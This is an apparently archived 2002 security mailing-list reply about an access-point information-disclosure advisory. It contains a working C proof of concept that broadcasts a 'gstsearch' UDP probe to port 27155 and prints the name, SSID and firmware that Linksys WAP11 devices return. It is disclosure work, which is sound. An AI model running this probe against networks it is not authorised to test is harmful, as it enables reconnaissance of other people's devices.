Re: Accesspoints disclose wep keys, password and mac filter (fwd)

From: Thomas Sarlandie (sarfata@altern.org)
Date: 11/05/02


Date: Tue, 05 Nov 2002 15:24:07 +0100
From: Thomas Sarlandie <sarfata@altern.org>
To: Tom Knienieder <knienieder@khamsin.ch>

Hi,

Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only
returns the AP's name, SSID and firmware version. Except for the firmware
version, that is not private information.

Quickly patched proof of concept:

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

/* Layout of the reply datagram (117 bytes). The fields are fixed width
 * and not guaranteed to be NUL-terminated, hence the %.*s prints below. */
typedef struct {
  char type[28];
  char blank1[8];
  char apname[32];
  char firmware[6];
  char blank2[11];
  char ssid[32];
}
__attribute__ ((packed)) answer;

int main(void)
{
        char rcvbuffer[1024];
        struct sockaddr_in sin;
        answer *ans = (answer *)rcvbuffer;
        int sd, ret, val;

        /* destination: limited broadcast, UDP port 27155 */
        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr("255.255.255.255");
        sin.sin_port = htons(27155);

        sd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sd < 0)
        {
                perror("socket");
                exit(1);
        }

        /* SO_BROADCAST is required before sending to 255.255.255.255 */
        val = 1;
        ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
        if (ret < 0)
        {
                perror("setsockopt");
                exit(1);
        }

        ret = sendto(sd, "gstsearch", 9, 0, (struct sockaddr *)&sin, sizeof(sin));
        if (ret < 0)
        {
                perror("sendto");
                exit(1);
        }

        /* only the first reply is read; the socket was auto-bound by sendto */
        ret = read(sd, rcvbuffer, sizeof(rcvbuffer));
        if (ret >= (int)sizeof(answer))
        {
                printf("Type : %.*s\n", (int)sizeof(ans->type), ans->type);
                printf("Announced Name : %.*s\n", (int)sizeof(ans->apname), ans->apname);
                printf("Firmware version : %.*s\n", (int)sizeof(ans->firmware), ans->firmware);
                printf("SSID : %.*s\n", (int)sizeof(ans->ssid), ans->ssid);
        }
        else if (ret < 0)
                perror("read");
        else
                fprintf(stderr, "short reply: %d bytes\n", ret);

        close(sd);
        return 0;
}

thomas

>KHAMSIN Security News
>KSN Reference: 2002-11-01 0001 ULO
>---------------------------------------------------------------------------
>
>Title
>-----
> Accesspoints disclose wep keys, password and mac filter
>
>Date
>----
> 2002-11-01
>